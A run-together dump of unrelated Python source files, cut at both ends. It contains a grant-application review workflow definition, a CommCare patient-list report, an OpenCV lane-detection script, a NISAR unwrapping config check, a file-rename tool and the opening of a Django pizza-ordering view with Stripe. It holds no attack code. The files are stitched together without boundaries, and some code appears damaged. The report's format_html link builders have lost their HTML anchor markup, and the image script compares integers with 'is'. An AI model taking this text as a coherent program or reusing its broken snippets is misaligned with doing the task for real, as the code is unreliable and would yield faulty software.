UserPermissions.ADMIN}, 'method': 'create_revision', }, }, 'display': _('More information required'), 'stage': RequestExt, 'permissions': applicant_edit_permissions, }, }, { 'ext_external_review': { 'transitions': { 'ext_post_external_review_discussion': _('Close Review'), 'ext_post_review_discussion': _('Ready For Discussion (revert)'), }, 'display': _('External Review'), 'stage': RequestExt, 'permissions': reviewer_review_permissions, }, }, { 'ext_post_external_review_discussion': { 'transitions': { 'ext_post_external_review_more_info': _('Request More Information'), 'ext_determination': _('Ready For Determination'), 'ext_external_review': _('Open External Review (revert)'), 'ext_almost': _('Accept but additional info required'), 'ext_accepted': _('Accept'), 'ext_rejected': _('Dismiss'), }, 'display': _('Ready For Discussion'), 'stage': RequestExt, 'permissions': hidden_from_applicant_permissions, }, 'ext_post_external_review_more_info': { 'transitions': { 'ext_post_external_review_discussion': { 'display': _('Submit'), 'permissions': {UserPermissions.APPLICANT, UserPermissions.STAFF, UserPermissions.LEAD, UserPermissions.ADMIN}, 'method': 'create_revision', }, }, 'display': _('More information required'), 'stage': RequestExt, 'permissions': applicant_edit_permissions, }, }, { 'ext_determination': { 'transitions': { 'ext_post_external_review_discussion': _('Ready For Discussion (revert)'), 'ext_almost': _('Accept but additional info required'), 'ext_accepted': _('Accept'), 'ext_rejected': _('Dismiss'), }, 'display': _('Ready for Determination'), 'permissions': hidden_from_applicant_permissions, 'stage': RequestExt, }, }, { 'ext_accepted': { 'display': _('Accepted'), 'future': _('Application Outcome'), 'stage': RequestExt, 'permissions': staff_edit_permissions, }, 'ext_almost': { 'transitions': { 'ext_accepted': _('Accept'), 'ext_post_external_review_discussion': _('Ready For Discussion (revert)'), }, 'display': _('Accepted but additional info required'), 'stage': RequestExt, 'permissions': applicant_edit_permissions, }, 'ext_rejected': { 'display': _('Dismissed'), 'stage': RequestExt, 'permissions': no_permissions, }, }, ] SingleStageCommunityDefinition = [ { DRAFT_STATE: { 'transitions': { INITIAL_STATE: { 'display': _('Submit'), 'permissions': {UserPermissions.APPLICANT}, 'method': 'create_revision', }, }, 'display': _('Draft'), 'stage': RequestCom, 'permissions': applicant_edit_permissions, } }, { INITIAL_STATE: { 'transitions': { 'com_more_info': _('Request More Information'), 'com_open_call': 'Open Call (public)', 'com_internal_review': _('Open Review'), 'com_community_review': _('Open Community Review'), 'com_determination': _('Ready For Determination'), 'com_rejected': _('Dismiss'), }, 'display': _('Need screening'), 'public': _('Application Received'), 'stage': RequestCom, 'permissions': default_permissions, }, 'com_more_info': { 'transitions': { INITIAL_STATE: { 'display': _('Submit'), 'permissions': {UserPermissions.APPLICANT, UserPermissions.STAFF, UserPermissions.LEAD, UserPermissions.ADMIN}, 'method': 'create_revision', }, }, 'display': _('More information required'), 'stage': RequestCom, 'permissions': applicant_edit_permissions, }, 'com_open_call': { 'transitions': { INITIAL_STATE: _('Need screening (revert)'), 'com_rejected': _('Dismiss'), }, 'display': 'Open Call (public)', 'stage': RequestCom, 'permissions': staff_edit_permissions, }, }, { 'com_internal_review': { 'transitions': { 'com_community_review': _('Open Community Review'), 'com_post_review_discussion': _('Close Review'), INITIAL_STATE: _('Need screening (revert)'), 'com_rejected': _('Dismiss'), }, 'display': _('Internal Review'), 'public': _('{org_short_name} Review').format(org_short_name=settings.ORG_SHORT_NAME), 'stage': RequestCom, 'permissions': default_permissions, }, 'com_community_review': { 'transitions': { 'com_post_review_discussion': _('Close Review'), 'com_internal_review': _('Open Internal Review (revert)'), 'com_rejected': _('Dismiss'), }, 'display': _('Community Review'), 'public': _('{org_short_name} Review').format(org_short_name=settings.ORG_SHORT_NAME), 'stage': RequestCom, 'permissions': community_review_permissions, }, }, { 'com_post_review_discussion': { 'transitions': { 'com_post_review_more_info': _('Request More Information'), 'com_external_review': _('Open External Review'), 'com_determination': _('Ready For Determination'), 'com_internal_review': _('Open Internal Review (revert)'), 'com_rejected': _('Dismiss'), }, 'display': _('Ready For Discussion'), 'stage': RequestCom, 'permissions': hidden_from_applicant_permissions, }, 'com_post_review_more_info': { 'transitions': { 'com_post_review_discussion': { 'display': _('Submit'), 'permissions': {UserPermissions.APPLICANT, UserPermissions.STAFF, UserPermissions.LEAD, UserPermissions.ADMIN}, 'method': 'create_revision', }, }, 'display': _('More information required'), 'stage': RequestCom, 'permissions': applicant_edit_permissions, }, }, { 'com_external_review': { 'transitions': { 'com_post_external_review_discussion': _('Close Review'), 'com_post_review_discussion': _('Ready For Discussion (revert)'), }, 'display': _('External Review'), 'stage': RequestCom, 'permissions': reviewer_review_permissions, }, }, { 'com_post_external_review_discussion': { 'transitions': { 'com_post_external_review_more_info': _('Request More Information'), 'com_determination': _('Ready For Determination'), 'com_external_review': _('Open External Review (revert)'), 'com_almost': _('Accept but additional info required'), 'com_accepted': _('Accept'), 'com_rejected': _('Dismiss'), }, 'display': _('Ready For Discussion'), 'stage': RequestCom, 'permissions': hidden_from_applicant_permissions, }, 'com_post_external_review_more_info': { 'transitions': { 'com_post_external_review_discussion': { 'display': _('Submit'), 'permissions': {UserPermissions.APPLICANT, UserPermissions.STAFF, UserPermissions.LEAD, UserPermissions.ADMIN}, 'method': 'create_revision', }, }, 'display': _('More information required'), 'stage': RequestCom, 'permissions': applicant_edit_permissions, }, }, { 'com_determination': { 'transitions': { 'com_post_external_review_discussion': _('Ready For Discussion (revert)'), 'com_almost': _('Accept but additional info required'), 'com_accepted': _('Accept'), 'com_rejected': _('Dismiss'), }, 'display': _('Ready for Determination'), 'permissions': hidden_from_applicant_permissions, 'stage': RequestCom, }, }, { 'com_accepted': { 'display': _('Accepted'), 'future': _('Application Outcome'), 'stage': RequestCom, 'permissions': staff_edit_permissions, }, 'com_almost': { 'transitions': { 'com_accepted': _('Accept'), 'com_post_external_review_discussion': _('Ready For Discussion (revert)'), }, 'display': _('Accepted but additional info required'), 'stage': RequestCom, 'permissions': applicant_edit_permissions, }, 'com_rejected': { 'display': _('Dismissed'), 'stage': RequestCom, 'permissions': no_permissions, }, }, ] DoubleStageDefinition = [ { DRAFT_STATE: { 'transitions': { INITIAL_STATE: { 'display': _('Submit'), 'permissions': {UserPermissions.APPLICANT}, 'method': 'create_revision', }, }, 'display': _('Draft'), 'stage': Concept, 'permissions': applicant_edit_permissions, } }, { INITIAL_STATE: { 'transitions': { 'concept_more_info': _('Request More Information'), 'concept_internal_review': _('Open Review'), 'concept_determination': _('Ready For Preliminary Determination'), 'invited_to_proposal': _('Invite to Proposal'), 'concept_rejected': _('Dismiss'), }, 'display': _('Need screening'), 'public': _('Concept Note Received'), 'stage': Concept, 'permissions': default_permissions, }, 'concept_more_info': { 'transitions': { INITIAL_STATE: { 'display': _('Submit'), 'permissions': {UserPermissions.APPLICANT, UserPermissions.STAFF, UserPermissions.LEAD, UserPermissions.ADMIN}, 'method': 'create_revision', }, 'concept_rejected': _('Dismiss'), 'invited_to_proposal': _('Invite to Proposal'), 'concept_determination': _('Ready For Preliminary Determination'), }, 'display': _('More information required'), 'stage': Concept, 'permissions': applicant_edit_permissions, }, }, { 'concept_internal_review': { 'transitions': { 'concept_review_discussion': _('Close Review'), INITIAL_STATE: _('Need screening (revert)'), 'invited_to_proposal': _('Invite to Proposal'), }, 'display': _('Internal Review'), 'public': _('{org_short_name} Review').format(org_short_name=settings.ORG_SHORT_NAME), 'stage': Concept, 'permissions': default_permissions, }, }, { 'concept_review_discussion': { 'transitions': { 'concept_review_more_info': _('Request More Information'), 'concept_determination': _('Ready For Preliminary Determination'), 'concept_internal_review': _('Open Review (revert)'), 'invited_to_proposal': _('Invite to Proposal'), 'concept_rejected': _('Dismiss'), }, 'display': _('Ready For Discussion'), 'stage': Concept, 'permissions': hidden_from_applicant_permissions, }, 'concept_review_more_info': { 'transitions': { 'concept_review_discussion': { 'display': _('Submit'), 'permissions': {UserPermissions.APPLICANT, UserPermissions.STAFF, UserPermissions.LEAD, UserPermissions.ADMIN}, 'method': 'create_revision', }, 'invited_to_proposal': _('Invite to Proposal'), }, 'display': _('More information required'), 'stage': Concept, 'permissions': applicant_edit_permissions, }, }, { 'concept_determination': { 'transitions': { 'concept_review_discussion': _('Ready For Discussion (revert)'), 'invited_to_proposal': _('Invite to Proposal'), 'concept_rejected': _('Dismiss'), }, 'display': _('Ready for Preliminary Determination'), 'permissions': hidden_from_applicant_permissions, 'stage': Concept, }, }, { 'invited_to_proposal': { 'display': _('Concept Accepted'), 'future': _('Preliminary Determination'), 'transitions': { 'draft_proposal': { 'display': _('Progress'), 'method': 'progress_application', 'permissions': {UserPermissions.STAFF, UserPermissions.LEAD, UserPermissions.ADMIN}, 'conditions': 'not_progressed', }, }, 'stage': Concept, 'permissions': no_permissions, }, 'concept_rejected': { 'display': _('Dismissed'), 'stage': Concept, 'permissions': no_permissions, }, }, { 'draft_proposal': { 'transitions': { 'proposal_discussion': {'display': _('Submit'), 'permissions': {UserPermissions.APPLICANT}, 'method': 'create_revision'}, 'external_review': _('Open External Review'), 'proposal_determination': _('Ready For Final Determination'), 'proposal_rejected': _('Dismiss'), }, 'display': _('Invited for Proposal'), 'stage': Proposal, 'permissions': applicant_edit_permissions, }, }, { 'proposal_discussion': { 'transitions': { 'proposal_more_info': _('Request More Information'), 'proposal_internal_review': _('Open Review'), 'external_review': _('Open External Review'), 'proposal_determination': _('Ready For Final Determination'), 'proposal_rejected': _('Dismiss'), }, 'display': _('Proposal Received'), 'stage': Proposal, 'permissions': default_permissions, }, 'proposal_more_info': { 'transitions': { 'proposal_discussion': { 'display': _('Submit'), 'permissions': {UserPermissions.APPLICANT, UserPermissions.STAFF, UserPermissions.LEAD, UserPermissions.ADMIN}, 'method': 'create_revision', }, 'external_review': _('Open External Review'), 'proposal_determination': _('Ready For Final Determination'), 'proposal_rejected': _('Dismiss'), }, 'display': _('More information required'), 'stage': Proposal, 'permissions': applicant_edit_permissions, }, }, { 'proposal_internal_review': { 'transitions': { 'post_proposal_review_discussion': _('Close Review'), 'proposal_discussion': _('Proposal Received (revert)'), }, 'display': _('Internal Review'), 'public': _('{org_short_name} Review').format(org_short_name=settings.ORG_SHORT_NAME), 'stage': Proposal, 'permissions': default_permissions, }, }, { 'post_proposal_review_discussion': { 'transitions': { 'post_proposal_review_more_info': _('Request More Information'), 'external_review': _('Open External Review'), 'proposal_determination': _('Ready For Final Determination'), 'proposal_internal_review': _('Open Internal Review (revert)'), 'proposal_rejected': _('Dismiss'), }, 'display': _('Ready For Discussion'), 'stage': Proposal, 'permissions': hidden_from_applicant_permissions, }, 'post_proposal_review_more_info': { 'transitions': { 'post_proposal_review_discussion': { 'display': _('Submit'), 'permissions': {UserPermissions.APPLICANT, UserPermissions.STAFF, UserPermissions.LEAD, UserPermissions.ADMIN}, 'method': 'create_revision', }, 'external_review': _('Open External Review'), }, 'display': _('More information required'), 'stage': Proposal, 'permissions': applicant_edit_permissions, }, }, { 'external_review': { 'transitions': { 'post_external_review_discussion': _('Close Review'), 'post_proposal_review_discussion': _('Ready For Discussion (revert)'), }, 'display': _('External Review'), 'stage': Proposal, 'permissions': reviewer_review_permissions, }, }, { 'post_external_review_discussion': { 'transitions': { 'post_external_review_more_info': _('Request More Information'), 'proposal_determination': _('Ready For Final Determination'), 'external_review': _('Open External Review (revert)'), 'proposal_almost': _('Accept but additional info required'), 'proposal_accepted': _('Accept'), 'proposal_rejected': _('Dismiss'), }, 'display': _('Ready For Discussion'), 'stage': Proposal, 'permissions': hidden_from_applicant_permissions, }, 'post_external_review_more_info': { 'transitions': { 'post_external_review_discussion': { 'display': _('Submit'), 'permissions': {UserPermissions.APPLICANT, UserPermissions.STAFF, UserPermissions.LEAD, UserPermissions.ADMIN}, 'method': 'create_revision', }, }, 'display': _('More information required'), 'stage': Proposal, 'permissions': applicant_edit_permissions, }, }, { 'proposal_determination': { 'transitions': { 'post_external_review_discussion': _('Ready For Discussion (revert)'), 'proposal_almost': _('Accept but additional info required'), 'proposal_accepted': _('Accept'), 'proposal_rejected': _('Dismiss'), }, 'display': _('Ready for Final Determination'), 'permissions': hidden_from_applicant_permissions, 'stage': Proposal, }, }, { 'proposal_accepted': { 'display': _('Accepted'), 'future': _('Final Determination'), 'stage': Proposal, 'permissions': staff_edit_permissions, }, 'proposal_almost': { 'transitions': { 'proposal_accepted': _('Accept'), 'post_external_review_discussion': _('Ready For Discussion (revert)'), }, 'display': _('Accepted but additional info required'), 'stage': Proposal, 'permissions': applicant_edit_permissions, }, 'proposal_rejected': { 'display': _('Dismissed'), 'stage': Proposal, 'permissions': no_permissions, }, }, ] def unpack_phases(phases): for step, step_data in enumerate(phases): for name, phase_data in step_data.items(): yield step, name, phase_data def phase_data(phases): return { phase_name: Phase(phase_name, step=step, **phase_data) for step, phase_name, phase_data in unpack_phases(phases) } Request = Workflow('Request', 'single', **phase_data(SingleStageDefinition)) RequestExternal = Workflow('Request with external review', 'single_ext', **phase_data(SingleStageExternalDefinition)) RequestCommunity = Workflow('Request with community review', 'single_com', **phase_data(SingleStageCommunityDefinition)) ConceptProposal = Workflow('Concept & Proposal', 'double', **phase_data(DoubleStageDefinition)) WORKFLOWS = { Request.admin_name: Request, RequestExternal.admin_name: RequestExternal, RequestCommunity.admin_name: RequestCommunity, ConceptProposal.admin_name: ConceptProposal, } # This is not a dictionary as the keys will clash for the first phase of each workflow # We cannot find the transitions for the first stage in this instance PHASES = list(itertools.chain.from_iterable(workflow.items() for workflow in WORKFLOWS.values())) def get_stage_change_actions(): changes = set() for workflow in WORKFLOWS.values(): stage = None for phase in workflow.values(): if phase.stage != stage and stage: changes.add(phase.name) stage = phase.stage return changes STAGE_CHANGE_ACTIONS = get_stage_change_actions() STATUSES = defaultdict(set) for key, value in PHASES: STATUSES[value.display_name].add(key) active_statuses = [ status for status, _ in PHASES if 'accepted' not in status and 'rejected' not in status and 'invited' not in status ] def get_review_active_statuses(user=None): reviews = set() for phase_name, phase in PHASES: if phase_name in active_statuses: if user is None: reviews.add(phase_name) elif phase.permissions.can_review(user): reviews.add(phase_name) return reviews def get_review_statuses(user=None): reviews = set() for phase_name, phase in PHASES: if 'review' in phase_name and 'discussion' not in phase_name: if user is None: reviews.add(phase_name) elif phase.permissions.can_review(user): reviews.add(phase_name) return reviews def get_ext_or_higher_statuses(): """ Returns a set of all the statuses for all workflow which are External Review or higher than that. """ ext_review_or_higher_statuses = set() for workflow in WORKFLOWS.values(): step = None for phase in workflow.values(): if phase.display_name == 'External Review': # Update the step for this workflow as External review state step = phase.step # Phase should have step higher or equal than External # review state for this workflow if step and phase.step >= step: ext_review_or_higher_statuses.add(phase.name) return ext_review_or_higher_statuses def get_accepted_statuses(): accepted_statuses = set() for phase_name, phase in PHASES: if phase.display_name == 'Accepted': accepted_statuses.add(phase_name) return accepted_statuses def get_dismissed_statuses(): dismissed_statuses = set() for phase_name, phase in PHASES: if phase.display_name == 'Dismissed': dismissed_statuses.add(phase_name) return dismissed_statuses ext_or_higher_statuses = get_ext_or_higher_statuses() review_statuses = get_review_statuses() accepted_statuses = get_accepted_statuses() dismissed_statuses = get_dismissed_statuses() DETERMINATION_PHASES = list(phase_name for phase_name, _ in PHASES if '_discussion' in phase_name) DETERMINATION_RESPONSE_PHASES = [ 'post_review_discussion', 'concept_review_discussion', 'post_external_review_discussion', 'ext_post_external_review_discussion', 'com_post_external_review_discussion', ] def get_determination_transitions(): transitions = {} for phase_name, phase in PHASES: for transition_name in phase.transitions: if 'accepted' in transition_name: transitions[transition_name] = 'accepted' elif 'rejected' in transition_name: transitions[transition_name] = 'rejected' elif 'more_info' in transition_name: transitions[transition_name] = 'more_info' elif 'invited_to_proposal' in transition_name: transitions[transition_name] = 'accepted' return transitions def get_action_mapping(workflow): # Maps action names to the phase they originate from transitions = defaultdict(lambda: {'display': '', 'transitions': []}) if workflow: phases = workflow.items() else: phases = PHASES for phase_name, phase in phases: for transition_name, transition in phase.transitions.items(): transition_display = transition['display'] transition_key = slugify(transition_display) transitions[transition_key]['transitions'].append(transition_name) transitions[transition_key]['display'] = transition_display return transitions DETERMINATION_OUTCOMES = get_determination_transitions() def phases_matching(phrase, exclude=list()): return [ status for status, _ in PHASES if status.endswith(phrase) and status not in exclude ] PHASES_MAPPING = { 'received': { 'name': _('Received'), 'statuses': [INITIAL_STATE, 'proposal_discussion'], }, 'internal-review': { 'name': _('Internal Review'), 'statuses': phases_matching('internal_review'), }, 'in-discussion': { 'name': _('Ready for Discussion'), 'statuses': phases_matching('discussion', exclude=[INITIAL_STATE, 'proposal_discussion']), }, 'more-information': { 'name': _('More Information Requested'), 'statuses': phases_matching('more_info'), }, 'invited-for-proposal': { 'name': _('Invited for Proposal'), 'statuses': ['draft_proposal'], }, 'external-review': { 'name': _('External Review'), 'statuses': phases_matching('external_review'), }, 'ready-for-determination': { 'name': _('Ready for Determination'), 'statuses': phases_matching('determination'), }, 'accepted': { 'name': _('Accepted'), 'statuses': phases_matching('accepted'), }, 'dismissed': { 'name': _('Dismissed'), 'statuses': phases_matching('rejected'), }, } OPEN_CALL_PHASES = [ 'com_open_call', ] COMMUNITY_REVIEW_PHASES = [ 'com_community_review', ] omari-funzone/commcare-hq from datetime import datetime, timedelta from couchdbkit import ResourceNotFound from django.utils.translation import ugettext_noop from sqlagg.base import AliasColumn from sqlagg.columns import SimpleColumn from sqlagg.filters import EQ, IN from corehq.apps.groups.dbaccessors import get_group_id_name_map_by_user from corehq.apps.groups.models import Group from corehq.apps.reports.datatables import DTSortType from corehq.apps.reports.sqlreport import DatabaseColumn, AggregateColumn, SqlTabularReport, DataFormatter, \ TableDataFormat from corehq.apps.reports.util import get_INFilter_bindparams from corehq.util.dates import iso_string_to_datetime from custom.succeed.reports.patient_interactions import PatientInteractionsReport from custom.succeed.reports.patient_task_list import PatientTaskListReport from custom.utils.utils import clean_IN_filter_value from memoized import memoized from corehq.apps.cloudcare.api import get_cloudcare_app from corehq.apps.cloudcare.utils import webapps_module_case_form from corehq.apps.reports.standard import CustomProjectReport, ProjectReportParametersMixin from django.utils.html import format_html from custom.succeed.reports import EMPTY_FIELD, CM7, CM_APP_CM_MODULE, OUTPUT_DATE_FORMAT from custom.succeed.utils import is_succeed_admin, SUCCEED_CM_APPNAME, has_any_role, get_app_build, SUCCEED_DOMAIN def target_date(visit_name, visit_days, randomization_date): if visit_name != 'last': tg_date = ((randomization_date + timedelta(days=int(visit_days))) - datetime.utcnow().date()).days if tg_date >= 7: output_html = (randomization_date + timedelta(days=int(visit_days))).strftime("%m/%d/%Y") elif 7 > tg_date > 0: output_html = " In %s day(s)" % tg_date elif tg_date == 0: output_html = "Today" else: output_html = "%s day(s) overdue" % (tg_date * (-1)) else: output_html = EMPTY_FIELD tg_date = -1000000 return { 'html': output_html, 'sort_key': tg_date * (-1) } def date_format(date_str): """ >>> date_format('2015-02-10 11:54:24') '02/10/2015' >>> date_format('2015-02-10 11:54:24.004000') '02/10/2015' """ if date_str: # this comes in with a ' ' instead of 'T' for some reason # would be nice to go back and figure out where that happens # probably `date_str = unicode(dt)` happens somewhere if ' ' in date_str and not date_str.endswith('Z'): date_str = date_str.replace(' ', 'T') + 'Z' date = iso_string_to_datetime(date_str) return date.strftime(OUTPUT_DATE_FORMAT) else: return EMPTY_FIELD def group_name(owner_id): results = get_group_id_name_map_by_user(owner_id, limit=1) if results: return results[0].name else: try: return Group.get(owner_id).name except ResourceNotFound: return "No Group" def edit_link(case_id, app_dict, latest_build): module = app_dict['modules'][CM_APP_CM_MODULE] form_idx = [ix for (ix, f) in enumerate(module['forms']) if f['xmlns'] == CM7][0] case_form_link = webapps_module_case_form( domain=app_dict['domain'], app_id=latest_build, module_id=CM_APP_CM_MODULE, form_id=form_idx, case_id=case_id) return format_html("Edit", case_form_link) def case_link(name, case_id): url = PatientInteractionsReport.get_url(*[SUCCEED_DOMAIN]) + "?patient_id=%s" % case_id if url: return { 'html': format_html("{}", url, name), 'sort_key': name } else: return "%s (bad ID format)" % name def tasks(case_id): url = PatientTaskListReport.get_url(*[SUCCEED_DOMAIN]) + "?patient_id=%s&task_status=open" % case_id if url: return format_html("Tasks", url) else: return "%s (bad ID format)" % case_id class PatientListReport(SqlTabularReport, CustomProjectReport, ProjectReportParametersMixin): name = ugettext_noop('Patient List') slug = 'patient_list' use_datatables = True table_name = 'fluff_UCLAPatientFluff' base_template = 'succeed/patient_list_report.html' fields = ['custom.succeed.fields.CareSite', 'custom.succeed.fields.PatientStatus'] @classmethod def show_in_navigation(cls, domain=None, project=None, user=None): if domain and project and user is None: return True if user and (is_succeed_admin(user) or has_any_role(user)): return True return False @property @memoized def rendered_report_title(self): return self.name @property def config(self): patient_status = self.request.GET.get('patient_status', None) cate_site = self.request.GET.get('care_site_display') is_active = None if patient_status: is_active = 'True' if patient_status == 'active' else 'False' owner_ids = [] user = self.request.couch_user if not user.is_web_user(): owner_ids = [user._id] + user.get_group_ids() return { 'domain': self.domain, 'is_active': is_active, 'care_site': cate_site.lower() if cate_site else None, 'owner_id': tuple(owner_ids) } @property def filters(self): filters = [EQ('domain', 'domain')] if 'is_active' in self.config and self.config['is_active']: filters.append(EQ('is_active', 'is_active')) if 'care_site' in self.config and self.config['care_site']: filters.append(EQ('care_site', 'care_site')) if 'owner_id' in self.config and self.config['owner_id']: filters.append(IN('owner_id', get_INFilter_bindparams('owner_id', self.config['owner_id']))) return filters @property def filter_values(self): return clean_IN_filter_value(super(PatientListReport, self).filter_values, 'owner_id') @property def columns(self): app_dict = get_cloudcare_app(SUCCEED_DOMAIN, SUCCEED_CM_APPNAME) latest_build = get_app_build(app_dict) return [ DatabaseColumn('Modify Schedule', SimpleColumn('doc_id', alias='case_id'), format_fn=lambda x: edit_link(x, app_dict, latest_build)), AggregateColumn('Name', aggregate_fn=case_link, columns=[SimpleColumn('name'), AliasColumn('case_id')], sort_type=''), DatabaseColumn('MRN', SimpleColumn('mrn')), DatabaseColumn('Randomization Date', SimpleColumn('date', alias='rand_date')), DatabaseColumn('Visit Name', SimpleColumn('visit_name', alias='vis_name')), AggregateColumn('Target Date', aggregate_fn=target_date, columns=[ AliasColumn('vis_name'), SimpleColumn('visit_days'), AliasColumn('rand_date') ], sort_type=DTSortType.NUMERIC), DatabaseColumn('Most Recent', SimpleColumn('bp_category')), DatabaseColumn('Last Interaction Date', SimpleColumn('last_interaction'), format_fn=date_format), DatabaseColumn('Tasks', AliasColumn('case_id'), format_fn=tasks), DatabaseColumn('Care Team', SimpleColumn('owner_id'), format_fn=group_name) ] @property def group_by(self): return ['case_id', 'name', 'mrn', 'rand_date', 'vis_name', 'visit_days', 'bp_category', 'last_interaction', 'owner_id'] @property def rows(self): formatter = DataFormatter(TableDataFormat(self.columns, no_value=self.no_value)) return formatter.format(self.data, keys=self.keys, group_by=self.group_by) import cv2 import imutils from imutils import perspective import numpy as np from scipy.optimize import fsolve from time import sleep def polyFit(xAxis, yAxis, degree): equation = list() if degree is 1: equation.append(np.polyfit(xAxis, yAxis, 1)[0]) equation.append(np.polyfit(xAxis, yAxis, 1)[1]) else: equation = [] return equation def convertToEquation(lines, image): equations = list() if lines is not None: for line in lines: x1, y1, x2, y2 = line.reshape(4) equations.append(polyFit((x1, x2), (image.shape[0] - y1, image.shape[0] -y2), 1)) return equations def drawEquations(image, equations): copyImage = image for equation in equations: y1 = 0 y2 = image.shape[0] x1 = int(solveInverseOfEquation(equation, y1)) x2 = int(solveInverseOfEquation(equation, y2)) print((x1, x2), (image.shape[0] - y1, image.shape[0] - y2)) cv2.line(copyImage, (x1, image.shape[0] - y1), (x2, image.shape[0] - y2), 120, 10) return copyImage def solveInverseOfEquation(equation, x): inverseEquation = [1/equation[0], -equation[1]/equation[0]] # func = np.poly1d(equation) # invFunc = np.poly1d(inverseEquation) print(equation, " ", inverseEquation) print((inverseEquation[0] * x) + inverseEquation[1]) return (inverseEquation[0] * x) + inverseEquation[1] def lineOperations(equations): equationsWithCloseValues = list() closeIndexes = list() equations.sort() for (i, test_equation1) in enumerate(equations, 0): for (j, test_equation2) in enumerate(equations, 0): diff = abs(np.arctan(test_equation1[0]) - np.arctan(test_equation2[0])) * 180/np.pi if (diff < 20) and (not equations[j] in closeIndexes): closeIndexes.append(test_equation2) if closeIndexes not in equationsWithCloseValues: equationsWithCloseValues.append(closeIndexes) closeIndexes = list() topThreeInLength = sortTheArrayLen(equationsWithCloseValues) TheReliableThreeLines = list() for line in sorted(topThreeInLength): # print(line) # print(" ") slopes = list() for s in line: slopes.append(s[0]) intercepts = list() for i in line: intercepts.append(i[1]) meanSlope = np.mean(slopes) meanIntercept = np.mean(intercepts) # print(meanSlope, meanIntercept) TheReliableThreeLines.append([meanSlope, meanIntercept]) return TheReliableThreeLines def sortTheArrayLen(array): theIndexList = list() for (i, l1) in enumerate(array): theIndexList.append([len(l1), i]) theIndexList = sorted(theIndexList, reverse=True) theTopThree = list() for t in theIndexList[:3]: indexNumber = t[1] theTopThree.append(array[indexNumber]) return theTopThree def warpImage(testImage): pts = np.array([(int(testImage.shape[1] * 0.25), int(testImage.shape[0] * 0.0)), (int(testImage.shape[1] * 0.75), int(testImage.shape[0] * 0.0)), (testImage.shape[1] * 0, testImage.shape[0] * 1), (testImage.shape[1] * 1, testImage.shape[0] * 1)]) warped = perspective.four_point_transform(testImage.copy(), pts) # print(warped) return warped frame = cv2.imread("test_image.jpg", 0) ############### IMAGE TAKING COMPLETE ################################# ############### IMAGE PRE PROCESS START ################################# cv2.imshow("actual frame", frame) frame = warpImage(frame[int(frame.shape[0]*0.50):int(frame.shape[0]),:]) blurred = cv2.GaussianBlur(frame, (15, 15), 0) cannyImage = cv2.Canny(blurred, 80, 220) cannyImage = cv2.GaussianBlur(cannyImage, (3, 3), 0) ############### IMAGE PRE PROCESS DONE ################################# ############### FINDING THE LINES ################################# thresh_area = 40 minLineLength = int(frame.shape[0]*0.333) maxLineGap = int(frame.shape[0]*0.333) lines = cv2.HoughLinesP(cannyImage, 3, np.pi/30, thresh_area, np.array([]), minLineLength=minLineLength, maxLineGap=maxLineGap) equationsg = convertToEquation(lines, cannyImage) Reliables = lineOperations(equationsg) drawnImage = drawEquations(frame, Reliables) ############### FINDING THE LINES DONE ################################# cv2.imshow("testImage", frame) cv2.imshow("blurred", blurred) cv2.imshow("canny image", cannyImage) # cv2.imshow("warped", warped) cv2.imshow("line image", drawnImage) cv2.waitKey(0) import os import journal import pybind_nisar.workflows.helpers as helpers from pybind_nisar.workflows.runconfig import RunConfig class UnwrapRunConfig(RunConfig): def __init__(self, args): super().__init__(args, 'insar') if self.args.run_config_path is not None: self.load_geocode_yaml_to_dict() self.geocode_common_arg_load() self.yaml_check() def yaml_check(self): ''' Check phase_unwrap specifics from YAML ''' error_channel = journal.error('CrossmulRunConfig.yaml_check') # Check if crossmul_path is provided (needed for stand-alone unwrapping) if self.cfg['processing']['phase_unwrap']['crossmul_path'] is None: err_str = "'crossmul_path' file path under `phase_unwrap' required for standalone execution with YAML" error_channel.log(err_str) raise ValueError(err_str) # Allocate, if not present, cfg related to user-unwrapper choice algorithm = self.cfg['processing']['phase_unwrap']['algorithm'] if algorithm not in self.cfg['processing']['phase_unwrap']: self.cfg['processing']['phase_unwrap'][algorithm] = {} # Check if crossmul path is a directory or a file crossmul_path = self.cfg['processing']['phase_unwrap']['crossmul_path'] if not os.path.isfile(crossmul_path): err_str = f"{crossmul_path} is invalid; needs to be a file" error_channel.log(err_str) raise ValueError(err_str) # Check if required polarizations/frequency are in crossmul_path file freq_pols = self.cfg['processing']['input_subset']['list_of_frequencies'] helpers.check_hdf5_freq_pols(crossmul_path, freq_pols) import logging from glob import glob from pathlib import Path from ..core.filesystem import rename_files, rename_folders from ..model.filesystem import OptionParser, Options from . import common logger = logging.getLogger(__name__) def rename(options: Options): function = rename_folders if options.dir_mode else rename_files result = function( options.workdir, options.pattern, options.to, ignore_case=not options.case_sensitive, recursive=options.recursive ) if not result: logger.warning( f"Değişiklik yapılmadı: {options.pattern=} {options.to=}" ) def main(): args = OptionParser().parse_args() log_level = logging.DEBUG if args.debug else logging.INFO common.initialize_logging(level=log_level) for path in args.paths: paths = [Path(p) for p in glob(path)] for path in paths: if path.is_dir(): options = Options.from_system_args(path) rename(options) else: logger.error(f"{path.name} is not valid path") if __name__ == "__main__": main() import os import re from django.contrib import messages from django.contrib.auth import authenticate, login, logout from django.contrib.auth.models import User from django.core.exceptions import ObjectDoesNotExist from django.http import HttpResponse, HttpResponseRedirect, JsonResponse from django.shortcuts import render from django.urls import reverse import stripe from .models import Addition, CartItem, DinnerPlatter, Order, Pasta, RegularPizza, Salad, SicilianPizza, Sub, Topping STRIPE_SECRET_KEY = os.getenv("STRIPE_SECRET_KEY") STRIPE_PUBLIC_KEY = os.getenv("STRIPE_PUBLIC_KEY") DOMAIN = os.getenv("DOMAIN") stripe.api_key = STRIPE_SECRET_KEY # Create your views here. def index(request): if not request.user.is_authenticated: return HttpResponseRedirect(reverse("login_view")) regular_pizzas = RegularPizza.objects.all() sicilian_pizzas = SicilianPizza.objects.all() subs = Sub.objects.all() pasta = Pasta.objects.all() salads = Salad.objects.all() dinner_platters = DinnerPlatter.objects.all() cart_items = CartItem.objects.filter( user=request.user, pending=False ) return render(request, "orders/index.html", { "regular_pizzas": regular_pizzas, "sicilian_pizzas": sicilian_pizzas, "subs": subs, "pasta": pasta, "salads": salads, "dinner_platters": dinner_platters, "cart_items": cart_items }) def register(request): if request.method == "POST": username = request.POST.get("username") email = request.POST.get("email") password = request.POST.get("password") confirmation = request.POST.get("confirmation") first_name = request.POST.get("first_name") last_name = request.POST.get("last_name") pattern = re.compile(r'\d.*?[A-Z].*?[a-z].*[^\da-zA-Z]') if not first_name: messages.error(request, "First Name may not be left blank.") return render(request, "orders/register.html") elif not last_name: messages.error(request, "Last Name may not be left blank.") return render(request, "orders/register.html") elif not username: 